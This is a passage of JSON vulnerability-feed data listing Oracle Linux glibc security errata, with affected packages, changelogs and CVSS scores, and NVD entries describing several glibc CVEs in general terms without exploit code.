"http://linux.oracle.com/errata/ELSA-2012-0126.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:44:33", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "ia64", "packageFilename": "glibc-utils-2.3.4-2.57.ia64.rpm", "packageName": "glibc-utils", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i686", "packageFilename": "glibc-2.3.4-2.57.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i686", "packageFilename": "glibc-2.3.4-2.57.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i686", "packageFilename": "glibc-2.3.4-2.57.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i686", "packageFilename": "nptl-devel-2.3.4-2.57.i686.rpm", "packageName": "nptl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i386", "packageFilename": "nptl-devel-2.3.4-2.57.i386.rpm", "packageName": "nptl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "x86_64", "packageFilename": "glibc-devel-2.3.4-2.57.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "x86_64", "packageFilename": "glibc-utils-2.3.4-2.57.x86_64.rpm", "packageName": "glibc-utils", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "ia64", "packageFilename": "glibc-2.3.4-2.57.ia64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "ia64", "packageFilename": "nptl-devel-2.3.4-2.57.ia64.rpm", "packageName": "nptl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "x86_64", "packageFilename": "nptl-devel-2.3.4-2.57.x86_64.rpm", "packageName": "nptl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "x86_64", "packageFilename": "nscd-2.3.4-2.57.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i386", "packageFilename": "glibc-utils-2.3.4-2.57.i386.rpm", "packageName": "glibc-utils", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i386", "packageFilename": "glibc-headers-2.3.4-2.57.i386.rpm", "packageName": "glibc-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "ia64", "packageFilename": "glibc-devel-2.3.4-2.57.ia64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i386", "packageFilename": "glibc-devel-2.3.4-2.57.i386.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i386", "packageFilename": "glibc-devel-2.3.4-2.57.i386.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "src", "packageFilename": "glibc-2.3.4-2.57.src.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "src", "packageFilename": "glibc-2.3.4-2.57.src.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "src", "packageFilename": "glibc-2.3.4-2.57.src.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "x86_64", "packageFilename": "glibc-2.3.4-2.57.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "ia64", "packageFilename": "glibc-profile-2.3.4-2.57.ia64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i386", "packageFilename": "glibc-common-2.3.4-2.57.i386.rpm", "packageName": "glibc-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i386", "packageFilename": "glibc-profile-2.3.4-2.57.i386.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "ia64", "packageFilename": "glibc-common-2.3.4-2.57.ia64.rpm", "packageName": "glibc-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "x86_64", "packageFilename": "glibc-common-2.3.4-2.57.x86_64.rpm", "packageName": "glibc-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "x86_64", "packageFilename": "glibc-profile-2.3.4-2.57.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "ia64", "packageFilename": "nscd-2.3.4-2.57.ia64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i386", "packageFilename": "glibc-2.3.4-2.57.i386.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "x86_64", "packageFilename": "glibc-headers-2.3.4-2.57.x86_64.rpm", "packageName": "glibc-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "i386", "packageFilename": "nscd-2.3.4-2.57.i386.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "arch": "ia64", "packageFilename": "glibc-headers-2.3.4-2.57.ia64.rpm", "packageName": "glibc-headers", "operator": "lt"}], "description": "[2.3.4-2.57]\n- Use malloc as needed in fnmatch (#769360)\n[2.3.4-2.56]\n- Fix handling if newline in addmntent (#769360)\n- Use correct type when casting d_tag (#769360).\n- Properly quite output of local (#769360)\n- Check size of pattern in wide character representation in fnmatch (#769360)\n- Report write error in addmnt even for cached streams (#769360)\n- ldd: Never run file directly (#769360).\n- Check values from TZ file header (#767685)\n- Workaround misconfigured system (#767685)\n[2.3.4-2.55]\n- Require exact glibc version in nscd (#657009)", "edition": 3, "reporter": "Oracle", "published": "2012-02-13T00:00:00", "title": "glibc security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-02-13T00:00:00", "id": "ELSA-2012-0125", "href": "http://linux.oracle.com/errata/ELSA-2012-0125.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:46:54", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "i686", "packageFilename": "glibc-common-2.12-1.47.el6.i686.rpm", "packageName": "glibc-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "i686", "packageFilename": "glibc-devel-2.12-1.47.el6.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "i686", "packageFilename": "glibc-devel-2.12-1.47.el6.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "x86_64", "packageFilename": "glibc-devel-2.12-1.47.el6.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "src", "packageFilename": "glibc-2.12-1.47.el6.src.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "src", "packageFilename": "glibc-2.12-1.47.el6.src.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "x86_64", "packageFilename": "glibc-headers-2.12-1.47.el6.x86_64.rpm", "packageName": "glibc-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "i686", "packageFilename": "glibc-utils-2.12-1.47.el6.i686.rpm", "packageName": "glibc-utils", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "x86_64", "packageFilename": "glibc-2.12-1.47.el6.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "x86_64", "packageFilename": "glibc-static-2.12-1.47.el6.x86_64.rpm", "packageName": "glibc-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "i686", "packageFilename": "glibc-2.12-1.47.el6.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "i686", "packageFilename": "glibc-2.12-1.47.el6.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "x86_64", "packageFilename": "nscd-2.12-1.47.el6.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "x86_64", "packageFilename": "glibc-utils-2.12-1.47.el6.x86_64.rpm", "packageName": "glibc-utils", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "i686", "packageFilename": "glibc-static-2.12-1.47.el6.i686.rpm", "packageName": "glibc-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "i686", "packageFilename": "glibc-static-2.12-1.47.el6.i686.rpm", "packageName": "glibc-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "x86_64", "packageFilename": "glibc-common-2.12-1.47.el6.x86_64.rpm", "packageName": "glibc-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "i686", "packageFilename": "glibc-headers-2.12-1.47.el6.i686.rpm", "packageName": "glibc-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "i686", "packageFilename": "nscd-2.12-1.47.el6.i686.rpm", "packageName": "nscd", "operator": "lt"}], "description": "[2.12-1.47]\n- Don't start AVC thread until credentials are installed (#700507)\n[2.12-1.46]\n- Update systemtaparches\n[2.12-1.45]\n- Update configure script\n[2.12-1.44]\n- Add gdb hooks (#711927)\n[2.12-1.43]\n- Don't assume AT_PAGESIZE is always available (#739184)\n- Define IP_MULTICAST_ALL (#738763)\n[2.12-1.42]\n- Avoid race between {,__de}allocate_stack and __reclaim_stacks during\n fork (#738665)\n[2.12-1.41]\n- Locale-independent parsing in libintl (#737778)\n[2.12-1.40]\n- Change setgroups to affect all the threads in the process (#736346)\n[2.12-1.39]\n- Make sure AVC thread has capabilities (#700507)\n- Fix memory leak in dlopen with RTLD_NOLOAD (#699724)\n[2.12-1.38]\n- Build libresolv with stack protector (#730379)\n[2.12-1.37]\n- Maintain stack alignment when cancelling threads (#731042)\n[2.12-1.36]\n- Fix missing debuginfo (#729036)\n[2.12-1.35]\n- Report write error in addmnt even for cached streams (#688980,\n CVE-2011-1089)\n- Handle Lustre filesystem (#712248)\n[2.12-1.34]\n- Query NIS domain only when needed (#718057)\n- Update: Use mmap for allocation of buffers used for __abort_msg\n (#676591)\n[2.12-1.33]\n- Don't use gethostbyaddr to determine canonical name (#714823)\n[2.12-1.32]\n- ldd: never run file directly (#713134)\n[2.12-1.31]\n- Support Intel processor model 6 and model 0x2c (#695595)\n- Optimize memcpy for SSSE3 (#695812)\n- Optimize strlen for SSE2 (#695963)\n[2.12-1.30]\n- Support f_flags in Linux statfs implementation (#711987)\n[2.12-1.29]\n- Avoid overriding CFLAGS (#706903)\n[2.12-1.28]\n- Use mmap for allocation of buffers used for __abort_msg (#676591)\n[2.12-1.27]\n- Fix PLT use due to __libc_alloca_cutoff\n- Schedule nscd cache pruning more accurately from re-added values\n (#703481)\n- Fix POWER4 optimized strncmp to not read past differing bytes\n (#694386)\n[2.12-1.26]\n- Create debuginfo-common on biarch platforms (#676467)\n- Use Rupee sign in Indian locales (#692838)\n- Signal temporary host lookup errors in nscd as such to the requester\n (#703480)\n- Define initgroups callback for nss_files (#705465)", "edition": 3, "reporter": "Oracle", "published": "2011-12-14T00:00:00", "title": "glibc security, bug fix, and enhancement update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-1089", "CVE-2009-5064"], "modified": "2011-12-14T00:00:00", "id": "ELSA-2011-1526", "href": "http://linux.oracle.com/errata/ELSA-2011-1526.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:44:23", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "i686", "packageFilename": "glibc-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "i686", "packageFilename": "glibc-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "x86_64", "packageFilename": "glibc-common-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "glibc-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "x86_64", "packageFilename": "glibc-devel-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "i686", "packageFilename": "nscd-2.12-1.47.el6_2.5.i686.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "x86_64", "packageFilename": "glibc-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "i686", "packageFilename": "glibc-common-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "i686", "packageFilename": "glibc-devel-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "i686", "packageFilename": "glibc-devel-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "x86_64", "packageFilename": "nscd-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "i686", "packageFilename": "glibc-headers-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "x86_64", "packageFilename": "glibc-headers-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "glibc-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "src", "packageFilename": "glibc-2.12-1.47.el6_2.5.src.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "src", "packageFilename": "glibc-2.12-1.47.el6_2.5.src.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "x86_64", "packageFilename": "glibc-utils-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "glibc-utils", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "i686", "packageFilename": "glibc-utils-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-utils", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "x86_64", "packageFilename": "glibc-static-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "glibc-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "i686", "packageFilename": "glibc-static-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "i686", "packageFilename": "glibc-static-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-static", "operator": "lt"}], "description": "[2.12-1.47.el6_2.5]\n- Avoid high cpu usage when accept fails with EMFILE (#767692)\n[2.12-1.47.el6_2.4]\n- Make implementation of ARENAS_TEST and ARENAS_MAX match\n documentation (#769594)\n- Check malloc arena atomically (#769594)\n[2.12-1.47.el6_2.3]\n- Check values from TZ file header (#767692)\n[2.12-1.47.el6_2.2]\n- Correctly reparse group line after enlarging the buffer\n (#766484)\n[2.12-1.47.el6_2.1]\n- Fix grouping and reuse other locales in various locales (#754116)", "edition": 3, "reporter": "Oracle", "published": "2012-01-24T00:00:00", "title": "glibc security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2009-5029"], "modified": "2012-01-24T00:00:00", "id": "ELSA-2012-0058", "href": "http://linux.oracle.com/errata/ELSA-2012-0058.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2016-09-03T13:21:30", "references": ["http://openwall.com/lists/oss-security/2011/03/08/10", "https://bugzilla.redhat.com/show_bug.cgi?id=682998", "https://bugzilla.redhat.com/show_bug.cgi?id=531160", "http://openwall.com/lists/oss-security/2011/03/07/7", "http://openwall.com/lists/oss-security/2011/03/08/1", "http://www.catonmat.net/blog/ldd-arbitrary-code-execution/", "http://reverse.lostrealm.com/protect/ldd.html", "http://openwall.com/lists/oss-security/2011/03/08/7", "http://openwall.com/lists/oss-security/2011/03/07/13", "http://www.redhat.com/support/errata/RHSA-2011-1526.html", "http://openwall.com/lists/oss-security/2011/03/07/10", "http://openwall.com/lists/oss-security/2011/03/08/3", "http://openwall.com/lists/oss-security/2011/03/08/2"], "edition": 1, "description": "** DISPUTED ** ldd in the GNU C Library (aka glibc or libc6) 2.13 and earlier allows local users to gain privileges via a Trojan horse executable file linked with a modified loader that omits certain LD_TRACE_LOADED_OBJECTS checks. NOTE: the GNU C Library vendor states \"This is just nonsense. There are a gazillion other ways to introduce code if people are downloading arbitrary binaries and install them in appropriate directories or set LD_LIBRARY_PATH etc.\"", "reporter": "NVD", "published": "2011-03-30T18:55:01", "type": "cve", "title": "CVE-2009-5064", "enchantments": {"score": {"modified": "2016-09-03T13:21:30", "vector": "NONE", "value": 7.2}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-5064"], "scanner": [], "cpe": ["cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:1.09.1", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:1.05", "cpe:/a:gnu:glibc:1.02", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:1.08", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:1.07", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:1.09", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:1.01", "cpe:/a:gnu:glibc:1.00", "cpe:/a:gnu:glibc:1.03", "cpe:/a:gnu:glibc:1.06", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:1.04", "cpe:/a:gnu:glibc:2.0.1"], "modified": "2012-01-18T22:44:52", "id": "CVE-2009-5064", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-5064", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T15:55:25", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=767299"], "edition": 1, "description": "The svc_run function in the RPC implementation in glibc before 2.15 allows remote attackers to cause a denial of service (CPU consumption) via a large number of RPC connections.", "reporter": "NVD", "published": "2013-05-02T10:55:01", "title": "CVE-2011-4609", "type": "cve", "enchantments": {"score": {"modified": "2016-09-03T15:55:25", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-4609"], "scanner": [], "modified": "2013-05-03T00:00:00", "cpe": ["cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.14", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:2.13", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.1.9"], "id": "CVE-2011-4609", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4609", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-08-17T11:14:44", "references": ["http://drosenbe.blogspot.com/2010/05/integer-overflow-in-ldso-cve-2010-0830.html", "https://lists.opensuse.org/opensuse-security-announce/2010-10/msg00007.html", "http://securitytracker.com/id?1024044", "http://www.debian.org/security/2010/dsa-2058", "http://frugalware.org/security/662", "http://www.vupen.com/english/advisories/2010/1246", "http://security.gentoo.org/glsa/glsa-201011-01.xml", "https://exchange.xforce.ibmcloud.com/vulnerabilities/58915", "http://www.ubuntu.com/usn/USN-944-1", "http://www.securityfocus.com/bid/40063", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:112", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:111", "http://sourceware.org/git/?p=glibc.git;a=commit;h=db07e962b6ea963dbb345439f6ab9b0cf74d87c5"], "description": "Integer signedness error in the elf_get_dynamic_info function in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows user-assisted remote attackers to execute arbitrary code via a crafted ELF program with a negative value for a certain d_tag structure member in the ELF header.", "edition": 3, "reporter": "NVD", "published": "2010-06-01T16:30:02", "title": "CVE-2010-0830", "type": "cve", "enchantments": {"score": {"modified": "2017-08-17T11:14:44", "vector": "NONE", "value": 9.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0830"], "scanner": [], "modified": "2017-08-16T21:32:08", "cpe": ["cpe:/a:gnu:glibc:2.3.6", "cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.3.10", "cpe:/a:gnu:glibc:2.2", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.3.3", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.9", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.11", "cpe:/a:gnu:glibc:2.3", "cpe:/a:gnu:glibc:2.4", "cpe:/a:gnu:glibc:2.11.1", "cpe:/a:gnu:glibc:2.6", "cpe:/a:gnu:glibc:2.2.2", "cpe:/a:gnu:glibc:2.2.5", "cpe:/a:gnu:glibc:2.2.3", "cpe:/a:gnu:glibc:2.10", "cpe:/a:gnu:glibc:2.6.1", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:2.2.4", "cpe:/a:gnu:glibc:2.10.1", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.5.1", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.7", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.3.2", "cpe:/a:gnu:glibc:2.8", "cpe:/a:gnu:glibc:2.2.1", "cpe:/a:gnu:glibc:2.3.4", "cpe:/a:gnu:glibc:2.1.9", "cpe:/a:gnu:glibc:2.3.5", "cpe:/a:gnu:glibc:2.5", "cpe:/a:gnu:glibc:2.3.1"], "id": "CVE-2010-0830", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0830", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-03T13:21:03", "references": ["http://sourceware.org/git/?p=glibc.git;a=commit;h=97ac2654b2d831acaa18a2b018b0736245903fd2", "http://dividead.wordpress.com/2009/06/01/glibc-timezone-integer-overflow/", "https://bugzilla.redhat.com/show_bug.cgi?id=761245", "http://lists.grok.org.uk/pipermail/full-disclosure/2011-December/084452.html", "http://sourceware.org/ml/libc-alpha/2011-12/msg00037.html"], "edition": 1, "description": "Integer overflow in the __tzfile_read function in glibc before 2.15 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted timezone (TZ) file, as demonstrated using vsftpd.", "reporter": "NVD", "published": "2013-05-02T10:55:01", "title": "CVE-2009-5029", "type": "cve", "enchantments": {"score": {"modified": "2016-09-03T13:21:03", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-5029"], "scanner": [], "modified": "2013-05-03T08:39:28", "cpe": ["cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.14", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:2.13", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.1.9"], "id": "CVE-2009-5029", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-5029", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-18T15:52:56", "references": ["http://sourceware.org/bugzilla/show_bug.cgi?id=12625", "https://bugzilla.redhat.com/show_bug.cgi?id=688980", "http://openwall.com/lists/oss-security/2011/03/05/3", 